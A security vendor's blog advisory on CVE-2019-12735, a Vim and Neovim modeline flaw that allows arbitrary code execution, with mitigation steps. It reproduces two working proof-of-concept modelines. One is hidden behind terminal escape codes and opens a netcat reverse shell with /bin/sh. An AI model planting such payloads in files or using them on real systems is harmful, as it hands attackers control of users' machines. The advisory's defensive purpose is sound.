credits: www.securityaffairs.co

Code Red! To all the Linux users out there, you have a high probability of getting your system hacked if you are using an older version of the command-line text editor.

The most popular and commonly used Vim editor and it’s extension, the Neovim editor were recently found to be vulnerable to arbitrary code execution using a crafted text file. Both the editors come pre-installed with several Linux-based operating systems. This vulnerability has been assigned CVE-2019-12735 and was discovered by the security expert, Armin Razmjou. The security advisory published by the security researcher last week includes two Proof-of-Concept exploits to support his claim.

The exploit mainly takes advantage of the ‘modelines’ handling methods of Vim. Modelines enable a user to set variables specific to a file. Vim analyzes these variables, which are generally placed at the start or the last few lines of a file and makes appropriate changes, like setting a tab to 5 spaces.

Proof of Concept:

1. The first PoC file mentioned in the advisory contained the following:

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

After saving this in a text file, say poc1.txt, run the following command:

$ vim poc1.txt

As soon as you run this command, you can see the output of the command ‘uname -a’

2. A typical real-life scenario can be demonstrated using the following PoC.

Consider the following command:

\x1b[?7l\x1bSWelcome to SecPod Technologies.\x1b:silent! w | call system(\'nohup nc 127.0.0.1 1234 -e /bin/sh &\') | redraw! | file | silent! # " vim: set fen fdm=expr fde=assert_fails(\'set\\ fde=x\\ \\|\\ source\\!\\ \\%\') fdl=0: \x16\x1b[1G\x16\x1b[KWelcome to SecPod Technologies."\x16\x1b[D \n

In the above line, an attacker embeds the command to set up Netcat and contact a machine of his/her choosing and sets up Netcat to listen to a specific port for an incoming connection. All that the attacker has to do is get an unsuspecting user to open the text file using Vim, following which the attacker gains complete access to the user’s system.

user’s screen (L) and the attacker’s screen (R)

Generally, a modeline does not allow options other than ‘set’. All other options will be executed in a sandbox to prevent security risks like shell command execution. However, Armin pointed out that the sandbox can be bypassed by using a :source! command (with the bang [!] modifier) . This runs and executes a command in such a way that the execution takes place after the sandbox is exited, which basically means that a modeline can be crafted to run code outside a sandbox.

# vim: set foldexpr=execute('\:source! some_file'): In case of Neovim, which prevents execute() from running, assert_fails() can be used instead, as it takes a {cmd} argument too.

This vulnerability has been assigned a high severity rating.

Affected versions: Vim : 8.1.1365 and earlier

                              Neovim : 0.3.6 and earlier

Solution/Mitigation

While the source code has been updated, we are yet to receive the updates from the respective Linux Vendors. Fedora has already released a patch and hopefully others will soon follow.

As additional measures, the researcher also recommends to

  • Disable modelines in the vimrc with the following commands

set modelines=0

set nomodeline

  • To use the securemodelines plugin, or to disable modelineexpr (since patch 8.1.1366, Vim-only) to disallow expressions in modelines.

Use SanerNow to detect and mitigate these vulnerabilities and prioritize your patching.


Summary
Flaw in Vim Editor could compromise your system
Article Name
Flaw in Vim Editor could compromise your system
Author
Publisher Name
SecPod Technologies
Publisher Logo

Leave a Reply

Your email address will not be published. Required fields are marked *